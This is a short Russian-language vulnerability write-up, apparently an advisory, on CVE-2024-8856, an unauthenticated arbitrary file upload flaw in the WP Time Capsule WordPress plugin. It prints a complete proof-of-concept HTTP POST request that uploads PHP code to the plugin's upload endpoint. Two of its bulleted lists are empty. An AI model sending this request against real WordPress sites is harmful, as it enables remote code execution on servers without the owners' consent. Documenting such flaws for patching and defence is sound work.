
Уязвимость произвольной загрузки файлов в плагине WP Time Capsule для WordPress
CVE-2024-8856 — это уязвимость безопасности, обнаруженная в плагине WP Time Capsule для WordPress, которая позволяет неаутентифицированным пользователям загружать произвольные файлы на сервер. Это может привести к удаленному выполнению кода, если загруженные файлы будут выполнены сервером. Уязвимость возникает из-за недостаточной проверки файлов и может быть использована путем отправки специально оформленных запросов на уязвимую конечную точку.
эта уязвимость позволяет неаутентифицированным пользователям:
Ниже приведено подтверждение концепции, демонстрирующее, как использовать уязвимость CVE-2024-8856 путем отправки POST-запроса на уязвимую конечную точку.
POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close
------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql
<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--
Для устранения этой уязвимости:
CVE-2024-8856 — Национальная база данных уязвимостей
CVE-2024-8856 — это серьезная уязвимость, требующая немедленного внимания со стороны администраторов сайтов WordPress, использующих плагин WP Time Capsule. Следует принять надлежащие меры предосторожности для защиты приложения от возможной эксплуатации. Всегда следите за обновлениями в области безопасности и обновлениями плагинов.